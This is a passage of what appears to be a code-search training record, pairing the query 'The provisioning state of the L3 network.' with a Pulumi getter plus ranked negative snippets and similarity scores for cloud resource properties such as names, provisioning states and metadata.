"def subresource_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"subresource_name\")",
"def subresource_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"subresource_name\")",
"def get_name(self) -> str:\n pass",
"def name() -> str:\n pass",
"def name(self):\n if self.resource.is_client:\n return f\"{self.network.name} {self.resource.name_connection_type} {SWITCH_TYPES[self.variable][0]}\"\n elif self.resource.is_eero or self.resource.is_profile:\n return f\"{self.network.name} {self.resource.name} {SWITCH_TYPES[self.variable][0]}\"\n return f\"{self.resource.name} {SWITCH_TYPES[self.variable][0]}\"",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")"
] | [
"0.8592593",
"0.8411918",
"0.8165518",
"0.8165518",
"0.8104756",
"0.7934077",
"0.7934077",
"0.7934077",
"0.7934077",
"0.7934077",
"0.76977456",
"0.758492",
"0.7497908",
"0.7401931",
"0.73212445",
"0.73001647",
"0.73001647",
"0.73001647",
"0.73001647",
"0.7297593",
"0.7297593",
"0.72648084",
"0.72442645",
"0.72442645",
"0.72442645",
"0.72442645",
"0.72442645",
"0.72442645",
"0.72179496",
"0.72178596",
"0.71673316",
"0.71673316",
"0.71673316",
"0.71673316",
"0.71673316",
"0.71463805",
"0.71410644",
"0.71410644",
"0.7136878",
"0.70834124",
"0.7079713",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005"
] | 0.0 | -1 |
The provisioning state of the L3 network. | def provisioning_state(self) -> pulumi.Output[str]:
return pulumi.get(self, "provisioning_state") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def get_provisioning_state(self):\n url = \"/api/v1/machine/{}\".format(self.machine_id)\n return self.urlhandler.get(url)",
"def provisioning_state(self) -> Optional[str]:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> Optional[str]:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> Optional[str]:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> Optional[str]:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> Optional[str]:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> Optional[pulumi.Input[Union[str, 'ProvisioningState']]]:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> Optional[pulumi.Input[Union[str, 'ProvisioningState']]]:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning(self):\n return self.properties.get('provisioning',\n EntityCollection(self.context, ProvisioningObjectSummary,\n ResourcePath(\"provisioning\", self.resource_path)))",
"def get_state(self):\n\t\treturn Job(SDK.PrlVm_GetState(self.handle)[0])",
"def state(self):\n return {\n 'network': self._network,\n 'target_network': self._target_network,\n 'optimizer': self._optimizer,\n 'num_steps': self._num_steps\n }",
"def status(self):\n return self.microblaze.state",
"def provisioning_status_message(self) -> str:\n return pulumi.get(self, \"provisioning_status_message\")",
"def provisioning_status_message(self) -> str:\n return pulumi.get(self, \"provisioning_status_message\")",
"def provisioning_status_message(self) -> str:\n return pulumi.get(self, \"provisioning_status_message\")",
"def provisioning_status_message(self) -> str:\n return pulumi.get(self, \"provisioning_status_message\")",
"def network_state(self):\n states = {\n 0: \"NETWORK_EMPTY\",\n 1: \"NETWORK_IDLE\",\n 2: \"NETWORK_LOADING\",\n 3: \"NETWORK_NO_SOURCE\",\n }\n return states[self._el._parent.execute_script(\"return arguments[0].networkState\", self._el)]",
"def network_state(self):\n states = {\n 0: \"NETWORK_EMPTY\",\n 1: \"NETWORK_IDLE\",\n 2: \"NETWORK_LOADING\",\n 3: \"NETWORK_NO_SOURCE\",\n }\n return states[self._el._parent.execute_script(\"return arguments[0].networkState\", self._el)]",
"def initial_state(self):\n # Network details elided.\n return self._agent.initial_state()",
"def provisioning_state_transition_time(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"provisioning_state_transition_time\")",
"def initial_state(self):\n # Network details elided.\n return self.agent.initial_state()",
"def initial_state(self):\n # Network details elided.\n return self.agent.initial_state()",
"def initial_state(self):\n # Network details elided.\n return self.agent.initial_state()",
"def state(self):\n\t\tif self._state in JOB_PS:\n\t\t\treturn JOB_PS[self._state]\n\t\telse:\n\t\t\treturn str(self._state)",
"def state(self):\n result = self.getResult()\n return result.state",
"def status(self):\n return self.state",
"def state(self):\n return self.coordinator.data[PVS_DEVICE_TYPE][self.base_unique_id][PVS_STATE]",
"def state(self):\n return pn_link_state(self._impl)",
"def get_state(self):\n\t\treturn call_sdk_function('PrlVmInfo_GetState', self.handle)",
"def updateState(self):\n self.state = self.microgridPolicy.computeState();",
"def state(self):\n data = self.coordinator.data[self._host_name][self._node_name][self._vm_id]\n if data[\"status\"] == \"running\":\n return STATE_ON\n return STATE_OFF",
"def get_net_state(self):\n json_ns_state = {}\n if (len(self.veth_peers) != 0):\n json_ns_state = {\n \"veth\": \"veth0\",\n \"namespace\": self.veth_peers[0],\n \"peer\": self.veth_peers[1],\n \"ip\": self.veth_peers[2],\n \"mac\": self.veth_peers[3]\n }\n\n json_host_state = {\n \"id\": self.id,\n \"ip\": self.ip,\n \"mac\": self.mac,\n \"veth\": json_ns_state\n }\n return json.dumps(json_host_state)",
"def status(self):\n return {\n 'id': 'status',\n 'protocol_version': 'PV62',\n 'network': self.origin_node.network.name,\n 'td': self.origin_node.chain.head.header.difficulty,\n 'best_hash': self.origin_node.chain.head.header.hash,\n 'genesis_hash': self.origin_node.chain.genesis.header.hash,\n 'size': kB_to_MB(self._message_size['status'])\n }",
"def state(self):\n return self.status",
"def state(self):\n return self.device.status(station=self.station_number)",
"def state(self):\n return self._node._state",
"def state(self):\n return self.get_state()",
"def status(self):\n return dict(price_data=self.price_data,\n profit_data=self.profit_data,\n next_network=self.next_network,\n current_network=self.current_network)",
"def state(self) -> 'outputs.DeviceStateResponse':\n return pulumi.get(self, \"state\")",
"def state(self):\n return self.device.value()",
"def state(self):\n msg = f\"Procs: {self.running_procs} / {self.procs_no}\"\n if self.gpus:\n msg += f\" | {len(self.gpus):d} GPUS:\"\n for gpu in self.gpus:\n msg += f\" {gpu}:{self.gpu_running_procs[gpu]}/{self.per_gpu[gpu]};\"\n return msg",
"def state(self):\n if self._key in self._product.get_data_states():\n return self._product.get_data_states()[self._key]\n return \"UNAVAILABLE\"",
"def initial_state(self):\n # Network details elided.\n initial_state = None\n\n return initial_state",
"def get_state(self):\n return self.env.sim.get_state()",
"def state(self):\n return pn_connection_state(self._impl)",
"def state(self):\n return self._attributes['status']",
"def getState(self) :\n return self.state",
"def device_state_attributes(self):\n return self._hass.data[DATA_UPCOMING]",
"def load_state(self):\n return self.state.read()",
"def state(self):\n return self._device.value",
"def resource_state(self) -> str:\n return pulumi.get(self, \"resource_state\")",
"def getState(self):\n return self.state",
"def getState(self):\n return self.state",
"def getState(self):\n return self.state",
"def get_status(self):\n if self.vm.get_cloud_status() != \"ACTIVE\":\n return \"stopped\"\n #wait for the vm to be ready and SSH-able\n self.vm.wait_ready()\n status = self.vm.run_command(\"ctool status\", indent=0, prefix='')\n return status.strip()",
"def state(self):\n return self.__state",
"def state(self):\n return self.__state",
"def state(self):\n return self._product.get_key(self._key)",
"def getState():\n # TODO: this isn't nearly as meaningful as it used to be",
"def state(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"state\")",
"def state(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"state\")"
] | [
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7780151",
"0.7650629",
"0.7297779",
"0.7297779",
"0.7297779",
"0.7297779",
"0.7297779",
"0.71375215",
"0.71375215",
"0.69446456",
"0.69446456",
"0.62829787",
"0.6200415",
"0.60750693",
"0.6069546",
"0.5996828",
"0.5996828",
"0.5996828",
"0.5996828",
"0.5968918",
"0.5968918",
"0.59117794",
"0.5890489",
"0.58898824",
"0.58898824",
"0.58898824",
"0.58421254",
"0.5837042",
"0.5776434",
"0.5730711",
"0.5727036",
"0.5669838",
"0.566613",
"0.56635886",
"0.5660558",
"0.56588566",
"0.5643122",
"0.5604866",
"0.55948174",
"0.5594465",
"0.55888265",
"0.5565366",
"0.5557419",
"0.5543605",
"0.5536889",
"0.5532075",
"0.55131495",
"0.5509596",
"0.55094665",
"0.5503161",
"0.5490002",
"0.54848033",
"0.54538727",
"0.5452888",
"0.5452005",
"0.5452005",
"0.5452005",
"0.54493344",
"0.5443926",
"0.5443926",
"0.54395664",
"0.5436718",
"0.54357076",
"0.54357076"
] | 0.7815268 | 9 |
Azure Resource Manager metadata containing createdBy and modifiedBy information. | def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
return pulumi.get(self, "system_data") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def get_metadata(self):\n md = self.resource.get_cdmi_user_meta()\n md.update(self.resource.get_acl_metadata())\n return md",
"def created_by(self) -> Optional['outputs.UserInfoResponse']:\n return pulumi.get(self, \"created_by\")",
"def created_by(self) -> \"str\":\n return self._attrs.get(\"createdBy\")",
"def created_by(self) -> \"str\":\n return self._attrs.get(\"createdBy\")",
"def created_by(self) -> \"str\":\n return self._attrs.get(\"createdBy\")",
"def created_by(self) -> \"str\":\n return self._attrs.get(\"createdBy\")",
"def created_by(self) -> str:\n return pulumi.get(self, \"created_by\")",
"def metadata(self):\r\n return resources.Metadata(self)",
"def metadata(self):\n return self.meta.metadata",
"def _metadata(self):\n meta = super()._metadata\n meta.update({\n \"name\": self.name,\n \"lead_in_time\": self.lead_in_time,\n \"amplification\": self.amplification,\n \"amplifier_clipping\": self.amplifier_clipping,\n \"power_threshold\": self.power_threshold,\n })\n return meta",
"def created_by(self) -> Optional[pulumi.Input['UserInfoArgs']]:\n return pulumi.get(self, \"created_by\")",
"def metadata(self): # -> None:\n ...",
"def get_metadata(self):\n return {}",
"def created_by(self, created_by: \"str\"):\n self._attrs[\"createdBy\"] = created_by",
"def created_by(self, created_by: \"str\"):\n self._attrs[\"createdBy\"] = created_by",
"def created_by(self, created_by: \"str\"):\n self._attrs[\"createdBy\"] = created_by",
"def created_by(self, created_by: \"str\"):\n self._attrs[\"createdBy\"] = created_by",
"def write_metadata_to_resource(self, resource,\n update_creators=False,\n update_contributors=False,\n update_creation_date=False,\n update_modification_date=False,\n update_title=False,\n update_keywords=False):\n if update_creators:\n for c in self.get_creators():\n if isinstance(c, GenericResourceMeta.ResourceCreator):\n # Set creator metadata, from bag metadata, to be used in create or update as needed (see below)\n kwargs = {'order': c.order, 'name': c.name,\n 'organization': c.organization,\n 'email': c.email, 'address': c.address,\n 'phone': c.phone, 'homepage': c.homepage,\n 'researcherID': c.researcherID,\n 'researchGateID': c.researchGateID}\n if c.rel_uri:\n # HydroShare user URIs are stored as relative not absolute URIs\n kwargs['hydroshare_user_id'] = c.id\n else:\n kwargs['hydroshare_user_id'] = None\n\n if self.owner_is_hs_user and c.order == 1:\n # Use metadata from bag for owner if the owner is a HydroShare user\n # (because the metadata were inheritted from the user profile when we\n # called create_resource above)\n\n # Find the owner in the creators metadata\n owner_metadata = resource.metadata.creators.filter(order=1).first()\n if owner_metadata is None:\n msg = \"Unable to find owner metadata for created resource {0}\".format(resource.short_id)\n raise GenericResourceMeta.ResourceMetaException(msg)\n # Update owner's creator metadata entry with what came from the bag metadata\n resource.metadata.update_element('Creator', owner_metadata.id, **kwargs)\n else:\n # For the non-owner creators, just create new metadata elements for them.\n resource.metadata.create_element('creator', **kwargs)\n else:\n msg = \"Creators with type {0} are not supported\"\n msg = msg.format(c.__class__.__name__)\n raise TypeError(msg)\n if update_contributors:\n for c in self.contributors:\n # Add contributors\n if isinstance(c, GenericResourceMeta.ResourceContributor):\n kwargs = {'name': c.name, 'organization': c.organization,\n 'hydroshare_user_id': c.id,\n 'email': c.email, 'address': c.address,\n 'phone': c.phone, 'homepage': c.homepage,\n 'researcherID': c.researcherID,\n 'researchGateID': c.researchGateID}\n resource.metadata.create_element('contributor', **kwargs)\n else:\n msg = \"Contributor with type {0} are not supported\"\n msg = msg.format(c.__class__.__name__)\n raise TypeError(msg)\n if update_title and self.title:\n resource.metadata.update_element('title', resource.metadata.title.id,\n value=self.title)\n if update_keywords and self.keywords:\n # Remove existing keywords\n if resource.metadata.subjects:\n resource.metadata.subjects.all().delete()\n for keyword in self.keywords:\n resource.metadata.create_element('subject', value=keyword)\n if self.abstract:\n if resource.metadata.description:\n resource.metadata.update_element('description', resource.metadata.description.id,\n abstract=clean_for_xml(self.abstract))\n else:\n resource.metadata.create_element('description',\n abstract=clean_for_xml(self.abstract))\n if self.rights:\n resource.metadata.update_element('rights', resource.metadata.rights.id,\n statement=self.rights.statement)\n if self.language:\n resource.metadata.update_element('language', resource.metadata.language.id,\n code=self.language)\n if update_creation_date and self.creation_date:\n res_created_date = resource.metadata.dates.all().filter(type='created')[0]\n res_created_date.start_date = self.creation_date\n res_created_date.save()\n # Update creation date representation provided by Mezzanine\n resource.created = self.creation_date\n resource.save()\n if len(self.coverages) > 0:\n resource.metadata.coverages.all().delete()\n for c in self.coverages:\n kwargs = {}\n if isinstance(c, GenericResourceMeta.ResourceCoveragePeriod):\n kwargs['type'] = 'period'\n val = {}\n val['name'] = c.name\n # val['start'] = c.start_date.isoformat()\n # val['end'] = c.end_date.isoformat()\n # Cast temporal coverages to month/day/year format as this is how they are stored as strings\n # in the metadata tables.\n val['start'] = c.start_date.strftime('%m/%d/%Y')\n val['end'] = c.end_date.strftime('%m/%d/%Y')\n val['scheme'] = c.scheme\n kwargs['value'] = val\n resource.metadata.create_element('coverage', **kwargs)\n elif isinstance(c, GenericResourceMeta.ResourceCoveragePoint):\n kwargs['type'] = 'point'\n val = {}\n val['name'] = c.name\n val['east'] = c.east\n val['north'] = c.north\n val['units'] = c.units\n val['elevation'] = c.elevation\n val['zunits'] = c.zunits\n val['projection'] = c.projection\n kwargs['value'] = val\n resource.metadata.create_element('coverage', **kwargs)\n elif isinstance(c, GenericResourceMeta.ResourceCoverageBox):\n kwargs['type'] = 'box'\n val = {}\n val['name'] = c.name\n val['northlimit'] = c.northlimit\n val['eastlimit'] = c.eastlimit\n val['southlimit'] = c.southlimit\n val['westlimit'] = c.westlimit\n val['units'] = c.units\n val['projection'] = c.projection\n val['uplimit'] = c.uplimit\n val['downlimit'] = c.downlimit\n val['zunits'] = c.zunits\n kwargs['value'] = val\n resource.metadata.create_element('coverage', **kwargs)\n else:\n msg = \"Coverages with type {0} are not supported\"\n msg = msg.format(c.__class__.__name__)\n raise TypeError(msg)\n if len(self.relations) > 0:\n resource.metadata.relations.all().delete()\n for r in self.relations:\n if isinstance(r, GenericResourceMeta.ResourceRelation):\n kwargs = {'type': r.relationship_type,\n 'value': r.uri}\n resource.metadata.create_element('relation', **kwargs)\n else:\n msg = \"Relations with type {0} are not supported\"\n msg = msg.format(r.__class__.__name__)\n raise TypeError(msg)\n\n if update_modification_date:\n # Update modification date last\n self.set_resource_modification_date(resource)",
"def created_by(self):\n return self._created_by",
"def created_by(self, is_updated=False):\n if not isinstance(self.json, dict):\n return\n if self.request.method == constants.PUT:\n is_updated = True\n\n created_by = 'system'\n if hasattr(self, 'user'):\n if self.user:\n created_by = self.user.email\n\n elif hasattr(self, 'google_user'):\n if self.google_user:\n created_by = self.google_user.get('email', 'system')\n\n key = 'created_by'\n if is_updated:\n key = 'updated_by'\n logging.info('{} is {}'.format(key, created_by))\n self.json[key] = created_by",
"def metadata(self) -> Mapping[str, str]:\n return pulumi.get(self, \"metadata\")",
"def get_additional_data(self, create):\n additional_data = {}\n if has_fields(self.get_queryset().model, 'created_by', 'modified_by'):\n additional_data['modified_by'] = self.request.user\n\n if create:\n additional_data['created_by'] = self.request.user\n\n return additional_data",
"def metadata(self) -> Mapping[str, str]:\r\n return self._metadata",
"def metadata(self) -> Mapping[str, str]:\r\n return self._metadata",
"def get_metadata(self):\n metadata = {}\n for k in self.metadata_keys:\n metadata[k] = copy.copy(getattr(self, k))\n return metadata",
"def metadata(self) -> dict:\n return self._metadata",
"def _metadata(self) -> Dict[str, Any]:\n return self.__metadata",
"async def metadata(self) -> AccountInformationMetaData:\n\n e = await self.request.request(url=f'https://accountinformation.roblox.com/v1/metadata', method='get')\n return AccountInformationMetaData(item=e)",
"def get_metadata(self):\n # currently there is no metadata to send\n return {}",
"def metadata(self) -> dict:\n\n meta = {}\n meta['name'] = self.name\n meta['potential_key'] = self.potential_key\n meta['potential_id'] = self.potential_id\n meta['potential_LAMMPS_key'] = self.potential_LAMMPS_key\n meta['potential_LAMMPS_id'] = self.potential_LAMMPS_id\n\n for subset in self.subsets:\n subset.metadata(meta)\n\n return meta",
"def created_by(self):\n if \"createdBy\" in self._prop_dict:\n if isinstance(self._prop_dict[\"createdBy\"], OneDriveObjectBase):\n return self._prop_dict[\"createdBy\"]\n else :\n self._prop_dict[\"createdBy\"] = IdentitySet(self._prop_dict[\"createdBy\"])\n return self._prop_dict[\"createdBy\"]\n\n return None",
"def metadata(self) -> dict:\n meta = {}\n meta['filename'] = self.filename\n meta['label'] = self.label\n meta['url'] = self.url\n\n return meta",
"def metadata(self) -> t.Mapping[str, str]:\n return self._metadata",
"def metadata(self):\n metadata = {}\n metadata['successful'] = True\n metadata['time_information'] = {'begin': self.begin.isoformat(),\n 'end': self.end.isoformat(),\n 'elapsed': self.elapsed,\n }\n metadata['user'] = self.user\n metadata['database'] = {'name': settings.DATABASES['default']['NAME'],\n 'host': settings.DATABASES['default']['HOST'],\n }\n metadata['input_arguments'] = self.input_arguments\n center_ids = [center.center_id for center in self.centers]\n metadata['registration_centers_processed'] = sorted(center_ids)\n metadata['total_pdf_file_count'] = self.n_total_files\n metadata['total_pdf_page_count'] = self.n_total_pages\n metadata['total_pdf_byte_count'] = self.n_total_bytes\n metadata['files'] = self.fileinfo\n metadata['offices'] = [model_to_dict(office) for office in self.offices.values()]\n\n return metadata",
"def metadata(self):\n return self._metadata",
"def metadata(self):\n return self._metadata",
"def metadata(self):\n return self._metadata",
"def metadata(self):\n return self._metadata",
"def metadata(self):\n return self._metadata",
"def _getMetadataName(self):\n pass",
"def created_by(self) -> Optional[str]:\n return pulumi.get(self, \"created_by\")",
"def created_by(self) -> Optional[str]:\n return pulumi.get(self, \"created_by\")",
"def created_by(self) -> Optional[str]:\n return pulumi.get(self, \"created_by\")",
"def created_by(self) -> Optional[str]:\n return pulumi.get(self, \"created_by\")",
"def created_by(self) -> Optional[str]:\n return pulumi.get(self, \"created_by\")",
"def created_by(self) -> Optional[str]:\n return pulumi.get(self, \"created_by\")",
"def metadata(self) -> dict:\n meta = {}\n meta['name'] = self.name\n meta['id'] = self.id\n meta['family'] = self.family\n \n meta['ptd_type'] = []\n meta['pos'] = []\n meta['atype'] = []\n meta['db_vect'] = []\n meta['scale'] = []\n for cp in self.parameters:\n meta['ptd_type'].append(cp.get('ptd_type', None))\n meta['pos'].append(cp.get('pos', None))\n meta['atype'].append(cp.get('atype', None))\n meta['db_vect'].append(cp.get('db_vect', None))\n meta['scale'].append(cp.get('scale', None))\n \n return meta",
"def metadata(self) -> global___SummaryMetadata:",
"def metadata(self):\r\n return self._metadata",
"def get_metadata(self):\n return self._metadata",
"def metadata(self):\n return copy.deepcopy(self._metadata)",
"def get_metadata(self):\n return self.manager.get_metadata(self)",
"def metadata(self) -> Metadata:\n return self._metadata",
"def metadata(self, metadata):\n return Metadata(metadata)",
"def last_modified_by(self) -> str:\n return pulumi.get(self, \"last_modified_by\")",
"def metadata(self):\n return {\n \"namespace\": self.namespace,\n \"short_name\": f\"{self.namespace}_{self._dataset_metadata['DatasetCode']}\",\n \"name\": f\"{self._dataset_metadata['DatasetName']} - FAO ({self.publication_year})\",\n \"description\": self._dataset_metadata[\"DatasetDescription\"],\n \"source_name\": \"Food and Agriculture Organization of the United Nations\",\n \"publication_year\": int(self.publication_year),\n \"publication_date\": self._dataset_metadata[\"DateUpdate\"],\n \"date_accessed\": str(dt.date.today()),\n \"url\": self.url,\n \"source_data_url\": self.source_data_url,\n \"file_extension\": \"zip\",\n }",
"def __metadata__(self):\n raise NotImplementedError",
"def metadata(self) -> 'outputs.DataCollectionEndpointResponseMetadata':\n return pulumi.get(self, \"metadata\")",
"def created_by(self):\n url = self._data.get('related', {}).get('created_by')\n return self._tower._get_object_by_url('User', url) # pylint: disable=protected-access",
"def get_avatar_metadata(self):\n # Implemented from template for osid.resource.ResourceForm.get_group_metadata_template\n metadata = dict(self._avatar_metadata)\n metadata.update({'existing_avatar_values': self._my_map['avatarId']})\n return Metadata(**metadata)",
"def metadata(self):\n return parse_metadata(self.metadata_path())",
"def GetResourceMetadata(self):\n nodepools = {}\n for name, nodepool in six.iteritems(self.nodepools):\n nodepool_metadata = {\n 'size': nodepool.num_nodes,\n 'machine_type': nodepool.vm_config.machine_type,\n 'name': name,\n }\n if nodepool.sandbox_config is not None:\n nodepool_metadata['sandbox_config'] = {\n 'type': nodepool.sandbox_config.type,\n }\n nodepools[name] = nodepool_metadata\n\n metadata = {\n 'cloud': self.CLOUD,\n 'cluster_type': self.CLUSTER_TYPE,\n 'zone': self.zone,\n 'size': self.num_nodes,\n 'machine_type': self.vm_config.machine_type,\n 'nodepools': nodepools,\n }\n\n if self.min_nodes != self.num_nodes or self.max_nodes != self.num_nodes:\n metadata.update({\n 'max_size': self.max_nodes,\n 'min_size': self.min_nodes,\n })\n\n return metadata",
"def managed_by(self) -> str:\n return pulumi.get(self, \"managed_by\")",
"def metadata(self): # -> list[Unknown]:\n ...",
"def metadata(self): # -> list[Unknown]:\n ...",
"def invocation_metadata(self):\n raise NotImplementedError()",
"def GetResourceMetadata(self):\n result = super().GetResourceMetadata()\n if self.created:\n result['container_cluster_version'] = self.k8s_version\n return result",
"def _get_metadata(self) -> Metadata:\n manifest = self._get_manifest()\n\n return Metadata(**manifest[\"metadata\"])",
"def metadata(self) -> Optional[Mapping[str, str]]:\n return pulumi.get(self, \"metadata\")",
"def metadata(self) -> Optional[pulumi.Input['SecurityAssessmentMetadataPropertiesArgs']]:\n return pulumi.get(self, \"metadata\")",
"def get_user_metadata(\n self,\n bucket: str,\n object_name: str\n ) -> typing.Dict[str, str]:\n raise NotImplementedError()",
"def get_metadata(self):\n meta_data = {}\n if self.beam_energy is not None:\n meta_data['beam_energy'] = self.beam_energy\n if self.collection_angle is not None:\n meta_data['collection_angle'] = self.collection_angle\n return meta_data",
"def last_modified_by(self):\n return self._last_modified_by",
"def metadata(self) -> \"ObjectMeta\":\n return typing.cast(\n \"ObjectMeta\",\n self._properties.get(\"metadata\"),\n )",
